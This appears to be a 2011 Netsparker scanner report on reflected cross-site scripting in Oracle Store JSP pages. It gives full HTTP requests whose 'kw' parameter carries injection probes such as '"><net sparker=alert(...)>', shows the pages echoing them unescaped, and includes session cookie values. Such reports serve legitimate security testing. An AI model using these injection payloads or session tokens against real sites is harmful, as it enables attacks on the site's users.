nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Sites</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/misibeCScdViewA.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Cart</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCOtdOrdSumMain.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Orders</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpProfMenuHome.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Profile</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Login</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOReg.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Register</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Help</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> </tr> </table> </td> </tr> <tr> <td height="1" colspan="2" valign="bottom" align="left"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabL.gif" alt="" border="0"/></td> <td nowrap class="OraTabBarEnabled"> <a class="OraTabBarEnabled" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCCtpSctDspRte.jsp?section=10380&sitex=10145:1298447:US">Home</a> </td> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabR.gif" alt="" border="0"/></td> <td width="1"/> </tr> </table> </td> </tr> <tr> <td align="left" background="/OA_HTML/cabo/images/swan/header-Bg.gif" colspan="2"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8" height="5" /></td> </tr> </table> </td> </tr> </table> </td> </tr></table><form method="get" target=_parent name=searchItemaction="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchResults.jsp"><INPUT TYPE=hidden NAME="cg" value=""><INPUT TYPE=hidden NAME="kw" value=""><INPUT TYPE=hidden NAME="ds" value="0"><INPUT TYPE=hidden NAME="dr" value="50"><INPUT TYPE=hidden NAME="st" value="kw"><INPUT TYPE=hidden NAME="cpg" value="0"> <!-- PREFAB_REF=""--></form><script language="JavaScript"><!--function postSearchItem() { var serIt = document.searchItem; var selIndex = document.common.cg.selectedIndex; serIt.cg.value = document.common.cg.options[selIndex].value; serIt.kw.value = document.common.kw.value; serIt.submit();}//--></script><form name=common onSubmit="postSearchItem();return false;"><table summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody> <tr class="searchBar"> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> <td align="left" valign="middle" nowrap height="25"> <table summary="" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="middle" nowrap class=prompt> Quick Search </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="cg"><span class="jttinvis"> Quick Search&nbsp;&nbsp;</span></label> <select id="cg" name="cg" class="prompt"> <option value=-200 >All Products <option value=10380>Home </select> </td> <td class="prompt" align="right" nowrap> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="query"><span class="jttinvis"> Keyword(s):</span></label> <INPUT id="query" TYPE="text" size="30" NAME="kw" value="'" ns= netsparker(0x001207)"> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td> <script language="JavaScript"> buttonGen("Go","javascript:postSearchItem()"); </script> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td nowrap> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchAdvForm.jsp?sitex=10145:1298447:US" target=_parent class="searchBarLink"> Advanced Search</a>&nbsp;<a class=searchBarLink target=_parent href="/OA_HTML/ibeCCtpSctDspRte.jsp?section=11365&media=os_g_english_help_search_tool">Help</a> </a> </td> </tr> </table> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> </tr></table></form><a id="TheContent" name="TheContent"></a><table class="contentBG" summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody><!-- 11/11/2008 amaheshw Bug 7502501 --><tr><td colspan=3><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></td></tr><tr><td><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=10></td><td width=100%><NOSCRIPT><table summary="" border=0 cellspacing=0 cellpadding=0> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=5><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=13></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR> <TR> <TD>&nbsp;</TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=OraBGAccentDark> <img alt='' height=32 src="/OA_MEDIA/jtfuwarn.gif" width=32></TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=errorHeader>Error</TD> <TD class=errorMessage><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=20></TD> <TD class=errorMessage width="100%"> <LI>JavaScript is disabled on your browser. JavaScript needs to be turned on for the application to be fully functional. </TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD>&nbsp;</TD> </TR> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=7><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR></table></NOSCRIPT>










<!-- $Header: ibeCAcdProfMenuTop.jsp 120.0 2005/05/30 03:20:10 appldev noship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><!-- ibeCCtdMenu.jsp end --><!-- ibeCZzdMenu.jsp end --><table summary='' border=0 width="100%" cellspacing="0" cellpadding="1" > <tr> <td valign="top" width="15%" >&nbsp;</td> <td valign="top" width="70%" class="pageTitle"> <!-------------------- bug 7559727 use error message box--------------------> <table width="100%" border="0" cellspacing="0" cellpadding="4" summary=""> <TR> <TD> </TD> </TR> </table> <!-------------------- end bug 7559727 --------------------> <!--- bug 7559727 &l..
- /OA_HTML/misibeCCtdItemDetail.jsp

/OA_HTML/misibeCCtdItemDetail.jsp

http://oraclestore.oracle.com/OA_HTML/misibeCCtdItemDetail.jsp?item=912634&section=87615&cg=-200&kw=..

Parameters

Parameter Type Value
item GET 912634
section GET 87615
cg GET -200
kw GET "><net sparker=alert(0x00147F)>

Request

GET /OA_HTML/misibeCCtdItemDetail.jsp?item=912634§ion=87615&cg=-200&kw=%22%3E%3Cnet%20sparker=netsparker(0x00147F)%3E HTTP/1.1
Referer: http://oraclestore.oracle.com/OA_HTML/misibeCCtdItemDetail.jsp?item=912634§ion=87615
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: oraclestore.oracle.com
Cookie: JSESSIONID=9276bb65259823956fcf21b8c98fb3a076c79f46799a8f130e594cf7769e4e8d.e34QbhaLa3mKbi0La3mQaNePax4Ne0; GSI_pses=ZG00FE042890ABC0AF7152CC6FD77EC0B63F9BF52868B06CFA5A6FCC0881AC7677CB9C87FEFA996BF58FD5B2D2A2EA79D9; BIGipServergsiap_store_http=3540882061.5150.0000; GSI=fnZ2RApjgPCFjXbHbfZfgO5Gcu
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Set-Cookie: JSESSIONID=9276bb65259823956fcf21b8c98fb3a076c79f46799a8f130e594cf7769e4e8d.e34Qb38Qax0Obi0La3mQaxaObxuNe0; path=/OA_HTML; secure
Content-Length: 10275
Date: Sun, 11 Sep 2011 18:04:42 GMT
































<!-- $Header: misibeCCtdItemDetail.jsp 120.0 2006/12/27 06:27:09 dpavani noship $ --><!-- Copy Of ibeCCtdItemDetail.jsp 120.7 --><!-- $Header: ibeCZzpHeader.jsp 120.32.12010000.3 2009/03/03 06:43:46 ukalaiah ship $ --><!-- ibeCZzpHeader.jsp end --><!-- $Header: ibeCCtpSetItem.jsp 120.2 2006/01/17 21:52:05 ssekar noship $ --><!-- $Header: ibeCCtpPostingI.jsp 120.0 2005/05/30 02:51:13 appldev noship $ --> <!-- ibeCCtpPostingI.jsp end --><!-- $Header: ibeCZzdTop.jsp 120.2 2005/07/04 04:26:38 appldev ship $ --> <!-- $Header: ibwTrackingHeader.jsp 120.6 2006/01/22 21:55 schittar noship $ -->















<!-- $Header: ibeCCtdTop.jsp 120.7.12010000.6 2010/04/23 07:18:39 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><HTML lang="EN-US"><HEAD> <TITLE> Site:Product Details </TITLE> <link rel=stylesheet href=ibeCStyleSheet.css> <SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"></script> <script LANGUAGE="javascript"> var disableanchorlink= true; var hidedivmouseout= [true, 200]; var formNameSL="null"; var relatedIndex="null"; function getWinOffset(what, offsettype){ return (what.offsetParent)? what[offsettype]+this.getWinOffset(what.offsetParent, offsettype) : what[offsettype]; } function isPopUpExist(m, e){ var e=window.event || e var c=e.relatedTarget || ((e.type=="mouseover")? e.fromElement : e.toElement) while (c && c!=m)try {c=c.parentNode} catch(e){c=m} if (c==m) return true; else return false; } function showSLPopup(anchorobj, subobj, e){ try{ if(isItemPopupOpen()){ closeItemPopup(); } }catch(ex){} formNameSL = anchorobj.getAttribute("formname"); try{ relatedIndex = anchorobj.getAttribute("relindex"); }catch(ex){} try{ document.getElementById('text_cr_shoplist').value='Create Shopping List'; }catch(ex){} try{ document.getElementById('text_cr_shoplist_details').value='Create Shopping List'; }catch(ex){} if (!this.isPopUpExist(anchorobj, e) || (e && e.type=="click")){ var e=window.event || e; if (e.type=="click" && subobj.style.visibility=="visible"){ subobj.style.visibility="hidden"; return; } var subobjtemp; if(formNameSL == 'relatedForm'){ subobjtemp=document.getElementById('tempoffset_related'); } else { subobjtemp=document.getElementById('tempoffset'); } var horizontaloffset=(subobj.dropposition[0]=="left")? -(subobj.offsetWidth-anchorobj.offsetWidth) : 0; var verticaloffset=(subobj.dropposition[1]=="top")? -subobj.offsetHeight : anchorobj.offsetHeight ; subobj.style.left=this.getWinOffset(subobjtemp, "offsetLeft") + horizontaloffset + "px"; subobj.style.top=this.getWinOffset(anchorobj, "offsetTop")+verticaloffset+"px"; subobj.style.clip=(subobj.dropposition[1]=="top")? "rect(auto auto auto 0)" : "rect(0 auto 0 0)"; subobj.style.visibility="visible"; subobj.startTime=new Date().getTime(); subobj.contentheight=parseInt(subobj.offsetHeight); if (typeof window["hidetimer_"+subobj.id]!="undefined") clearTimeout(window["hidetimer_"+subobj.id]); this.slideengine(subobj, (subobj.dropposition[1]=="top")? "up" : "down"); } } function curveincrement(percent){ return (1-Math.cos(percent*Math.PI)) / 2 ; } function slideengine(obj, direction){ var elapsed=new Date().getTime()-obj.startTime; if (elapsed<obj.glidetime){ var distancepercent=(direction=="down")? this.curveincrement(elapsed/obj.glidetime) : 1-this.curveincrement(elapsed/obj.glidetime); var currentclip=(distancepercent*obj.contentheight)+"px"; obj.style.clip=(direction=="down")? "rect(0 auto "+currentclip+" 0)" : "rect("+currentclip+" auto auto 0)"; window["glidetimer_"+obj.id]=setTimeout(function(){slideengine(obj, direction)}, 10); } else{ obj.style.clip="rect(0 auto auto 0)"; } } function hide(activeobj, subobj, e){ if (!isPopUpExist(activeobj, e)){ window["hidetimer_"+subobj.id]=setTimeout(function(){ subobj.style.visibility="hidden" subobj.style.left=subobj.style.top=0 clearTimeout(window["glidetimer_"+subobj.id]) }, hidedivmouseout[1]) } } function initpopup(anchorid, pos, glidetime, revealbehavior){ var anchorobj=document.getElementById(anchorid); var subobj=document.getElementById(anchorobj.getAttribute('rel')); subobj.dropposition=pos.split("-"); subobj.glidetime=glidetime || 1000; subobj.style.left=subobj.style.top=0; if (typeof revealbehavior=='undefined' || revealbehavior=='mouseover'){ anchorobj.onmouseover=function(e){showSLPopup(this, subobj, e)} anchorobj.onmouseout=function(e){hide(subobj, subobj, e)} if (this.disableanchorlink) anchorobj.onclick=function(){return false} } else anchorobj.onclick=function(e){showSLPopup(this, subobj, e); return false} if (this.hidedivmouseout[0]==true) subobj.onmouseout=function(e){hide(this, subobj, e)} }</script> </HEAD><body class="applicationBody"><!-- ibeCCtdTop.jsp end --><!-- ibeCZzdTop.jsp end --><!-- $Header: ibeCZzdMenu.jsp 120.4 2005/09/16 11:44:37 appldev ship $ -->



























<!-- $Header: ibeCCtdMenu.jsp 120.32.12010000.7 2009/06/02 09:02:13 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><a href="#TheContent"><img src="/OA_MEDIA/jtfutrpx.gif" align=right width=1 height=1 alt="Skip navigation elements to page contents" border="0"></a><table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td class="topBG"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td colspan="2" height="10"><img src="/OA_MEDIA/jtfutrpx.gif" alt="" height="10"></td> </tr> <tr><!--- Commented the hardrcoded logo image bug 6794502 <td width="5%" valign="center"> <img src="/OA_MEDIA/FNDSSCORP.gif" alt="" border="0"/> </td>---><td width='5%' valign='center' ><a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=14405:1435532:US"><img src="jtfDownload.jsp?fileid=ZGEAD44BF9BE1E7AB7517B55D3597145040F469CCAB2207FC5&appName=IBE&sitex=14405:1435532:US" ALT="Logo principal du magasin" border=0 ></a></td> <td width="95%" valign="bottom" class="applicationName"> &nbsp;&nbsp;Oracle Unbreakable Linux and Oracle VM Store </td> </tr> <tr> <td colspan="2" align="right"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Sites</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/misibeCScdViewA_LJE.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Cart</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCOtdOrdSumMain.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Orders</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpProfMenuHome.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Profile</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Login</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOReg.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Register</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Help</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> </tr> </table> </td> </tr> <tr> <td height="1" colspan="2" valign="bottom" align="left"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1"><img src="/OA_HTML/cabo/images/swan/topTabL.gif" alt="" border="0"/></td> <td nowrap class="OraTabBarSelected"> <a class="OraTabBarSelected" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCCtpSctDspRte.jsp?section=87615&sitex=14405:1435532:US">Oracle Unbreakable Linux and Oracle VM Store</a> </td> <td width="1"><img src="/OA_HTML/cabo/images/swan/topTabR.gif" alt="" border="0"/></td> <td width="1"/> </tr> </table> </td> </tr> <tr> <td align="left" background="/OA_HTML/cabo/images/swan/header-Bg.gif" colspan="2"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8" height="5" /></td> </tr> </table> </td> </tr> </table> </td> </tr></table><form method="get" target=_parent name=searchItemaction="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchResults.jsp"><INPUT TYPE=hidden NAME="cg" value=""><INPUT TYPE=hidden NAME="kw" value=""><INPUT TYPE=hidden NAME="ds" value="0"><INPUT TYPE=hidden NAME="dr" value="50"><INPUT TYPE=hidden NAME="st" value="kw"><INPUT TYPE=hidden NAME="cpg" value="0"> <!-- PREFAB_REF=""--></form><script language="JavaScript"><!--function postSearchItem() { var serIt = document.searchItem; var selIndex = document.common.cg.selectedIndex; serIt.cg.value = document.common.cg.options[selIndex].value; serIt.kw.value = document.common.kw.value; serIt.submit();}//--></script><form name=common onSubmit="postSearchItem();return false;"><table summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody> <tr class="searchBar"> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> <td align="left" valign="middle" nowrap height="25"> <table summary="" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="middle" nowrap class=prompt> Quick Search </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="cg"><span class="jttinvis"> Quick Search&nbsp;&nbsp;</span></label> <select id="cg" name="cg" class="prompt"> <option value=-200 >All Products <option value=-200>All Products </select> </td> <td class="prompt" align="right" nowrap> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="query"><span class="jttinvis"> Keyword(s):</span></label> <INPUT id="query" TYPE="text" size="30" NAME="kw" value=""><net sparker=netsparker(0x00147F)>"> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td> <script language="JavaScript"> buttonGen("Go","javascript:postSearchItem()"); </script> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td nowrap> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchAdvForm.jsp?sitex=14405:1435532:US" target=_parent class="searchBarLink"> Advanced Search</a>&nbsp;<a class=searchBarLink target=_parent href="/OA_HTML/ibeCCtpSctDspRte.jsp?section=11365&media=os_g_english_help_search_tool">Help</a> </a> </td> </tr> </table> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> </tr></table></form><a id="TheContent" name="TheContent"></a><table class="contentBG" summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody><!-- 11/11/2008 amaheshw Bug 7502501 --><tr><td colspan=3><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></td></tr><tr><td><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=10></td><td width=100%><NOSCRIPT><table summary="" border=0 cellspacing=0 cellpadding=0> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=5><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=13></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR> <TR> <TD>&nbsp;</TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=OraBGAccentDark> <img alt='' height=32 src="/OA_MEDIA/jtfuwarn.gif" width=32></TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=errorHeader>Error</TD> <TD class=errorMessage><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=20></TD> <TD class=errorMessage width="100%"> <LI>JavaScript is disabled on your browser. JavaScript needs to be turned on for the application to be fully functional. </TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD>&nbsp;</TD> </TR> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=7><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR></table></NOSCRIPT>










<!-- $Header: ibeCAcdProfMenuTop.jsp 120.0 2005/05/30 03:20:10 appldev noship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><!-- ibeCCtdMenu.jsp end --><!-- ibeCZzdMenu.jsp end --><!-- body section ------------------------------------------------------------><table summary='' border="0" width="100%"> <table summary='' cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <TR> <!-- left column --------------------------------------------------------> <TD vAlign=top width="15%"> <!-- $He..
- /OA_HTML/misibeCScdViewA_LJE.jsp

/OA_HTML/misibeCScdViewA_LJE.jsp

http://oraclestore.oracle.com/OA_HTML/misibeCScdViewA_LJE.jsp?sitex=10084:1298440:F&cg=-200&kw=%27%2..

Parameters

Parameter Type Value
sitex GET 10084:1298440:F
cg GET -200
kw GET '" ns= alert(0x0010C6)

Request

GET /OA_HTML/misibeCScdViewA_LJE.jsp?sitex=10084:1298440:F&cg=-200&kw=%27%22%20ns=%20netsparker(0x0010C6)%20 HTTP/1.1
Referer: http://oraclestore.oracle.com/OA_HTML/misibeCScdViewA_LJE.jsp?sitex=10084:1298440:F
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: oraclestore.oracle.com
Cookie: JSESSIONID=0e8d99bca8889ba5202caaba4eabb454e0da6721a75bdc54b6aecbc8ec1824e0.e34Qb38Qax0Obi0La3mQaxaObxuMe0; GSI_pses=ZG9416F52087143802B4106FD2A71CEE5F039BB16065C7FE8857D8EBBE634517628DE845A762FF82D86A6C50E146869B8B; BIGipServergsiap_store_http=3540882061.5150.0000; GSI=j8Rnjln8bRrxqwuVKOYUAaal5p
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Set-Cookie: JSESSIONID=0e8d99bca8889ba5202caaba4eabb454e0da6721a75bdc54b6aecbc8ec1824e0.e34Qb38Qax0Obi0La3mQaxaObxuMe0; path=/OA_HTML; secure
Content-Length: 10624
Date: Sun, 11 Sep 2011 18:02:39 GMT
































<!-- $Header: misibeCScdViewA_LJE.jsp 120.10 2008/01/22 07:35:18 gfaroz noship $ --><!-- Copy Of ibeCScdViewA.jsp 120.16 --><SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"> </SCRIPT><!-- $Header: ibeCZzpHeader.jsp 120.32.12010000.3 2009/03/03 06:43:46 ukalaiah ship $ --><!-- ibeCZzpHeader.jsp end --><!-- $Header: ibeCScpCookie.jsp 120.0 2005/05/30 02:29:43 appldev noship $ --> <!-- ibeCScpCookie.jsp end --><!-- Util page contains helper api for Carts/Quotes--> <!-- $Header: ibeCScpQuoteUtil.jsp 120.0 2005/05/30 03:28:38 appldev noship $ --><!-- $Header: ibeCCtpPostingI.jsp 120.0 2005/05/30 02:51:13 appldev noship $ --> <!-- ibeCCtpPostingI.jsp end --><!-- $Header: ibeCZzdTop.jsp 120.2 2005/07/04 04:26:38 appldev ship $ --> <!-- $Header: ibwTrackingHeader.jsp 120.6 2006/01/22 21:55 schittar noship $ -->















<!-- $Header: ibeCCtdTop.jsp 120.7.12010000.6 2010/04/23 07:18:39 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><HTML lang="FR-FR"><HEAD> <TITLE> Site :Chariot </TITLE> <link rel=stylesheet href=ibeCStyleSheet.css> <SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"></script> <script LANGUAGE="javascript"> var disableanchorlink= true; var hidedivmouseout= [true, 200]; var formNameSL="null"; var relatedIndex="null"; function getWinOffset(what, offsettype){ return (what.offsetParent)? what[offsettype]+this.getWinOffset(what.offsetParent, offsettype) : what[offsettype]; } function isPopUpExist(m, e){ var e=window.event || e var c=e.relatedTarget || ((e.type=="mouseover")? e.fromElement : e.toElement) while (c && c!=m)try {c=c.parentNode} catch(e){c=m} if (c==m) return true; else return false; } function showSLPopup(anchorobj, subobj, e){ try{ if(isItemPopupOpen()){ closeItemPopup(); } }catch(ex){} formNameSL = anchorobj.getAttribute("formname"); try{ relatedIndex = anchorobj.getAttribute("relindex"); }catch(ex){} try{ document.getElementById('text_cr_shoplist').value='Créer une liste d'achats'; }catch(ex){} try{ document.getElementById('text_cr_shoplist_details').value='Créer une liste d'achats'; }catch(ex){} if (!this.isPopUpExist(anchorobj, e) || (e && e.type=="click")){ var e=window.event || e; if (e.type=="click" && subobj.style.visibility=="visible"){ subobj.style.visibility="hidden"; return; } var subobjtemp; if(formNameSL == 'relatedForm'){ subobjtemp=document.getElementById('tempoffset_related'); } else { subobjtemp=document.getElementById('tempoffset'); } var horizontaloffset=(subobj.dropposition[0]=="left")? -(subobj.offsetWidth-anchorobj.offsetWidth) : 0; var verticaloffset=(subobj.dropposition[1]=="top")? -subobj.offsetHeight : anchorobj.offsetHeight ; subobj.style.left=this.getWinOffset(subobjtemp, "offsetLeft") + horizontaloffset + "px"; subobj.style.top=this.getWinOffset(anchorobj, "offsetTop")+verticaloffset+"px"; subobj.style.clip=(subobj.dropposition[1]=="top")? "rect(auto auto auto 0)" : "rect(0 auto 0 0)"; subobj.style.visibility="visible"; subobj.startTime=new Date().getTime(); subobj.contentheight=parseInt(subobj.offsetHeight); if (typeof window["hidetimer_"+subobj.id]!="undefined") clearTimeout(window["hidetimer_"+subobj.id]); this.slideengine(subobj, (subobj.dropposition[1]=="top")? "up" : "down"); } } function curveincrement(percent){ return (1-Math.cos(percent*Math.PI)) / 2 ; } function slideengine(obj, direction){ var elapsed=new Date().getTime()-obj.startTime; if (elapsed<obj.glidetime){ var distancepercent=(direction=="down")? this.curveincrement(elapsed/obj.glidetime) : 1-this.curveincrement(elapsed/obj.glidetime); var currentclip=(distancepercent*obj.contentheight)+"px"; obj.style.clip=(direction=="down")? "rect(0 auto "+currentclip+" 0)" : "rect("+currentclip+" auto auto 0)"; window["glidetimer_"+obj.id]=setTimeout(function(){slideengine(obj, direction)}, 10); } else{ obj.style.clip="rect(0 auto auto 0)"; } } function hide(activeobj, subobj, e){ if (!isPopUpExist(activeobj, e)){ window["hidetimer_"+subobj.id]=setTimeout(function(){ subobj.style.visibility="hidden" subobj.style.left=subobj.style.top=0 clearTimeout(window["glidetimer_"+subobj.id]) }, hidedivmouseout[1]) } } function initpopup(anchorid, pos, glidetime, revealbehavior){ var anchorobj=document.getElementById(anchorid); var subobj=document.getElementById(anchorobj.getAttribute('rel')); subobj.dropposition=pos.split("-"); subobj.glidetime=glidetime || 1000; subobj.style.left=subobj.style.top=0; if (typeof revealbehavior=='undefined' || revealbehavior=='mouseover'){ anchorobj.onmouseover=function(e){showSLPopup(this, subobj, e)} anchorobj.onmouseout=function(e){hide(subobj, subobj, e)} if (this.disableanchorlink) anchorobj.onclick=function(){return false} } else anchorobj.onclick=function(e){showSLPopup(this, subobj, e); return false} if (this.hidedivmouseout[0]==true) subobj.onmouseout=function(e){hide(this, subobj, e)} }</script> </HEAD><body class="applicationBody"><!-- ibeCCtdTop.jsp end --><!-- ibeCZzdTop.jsp end --><!-- $Header: ibeCZzdMenu.jsp 120.4 2005/09/16 11:44:37 appldev ship $ -->



























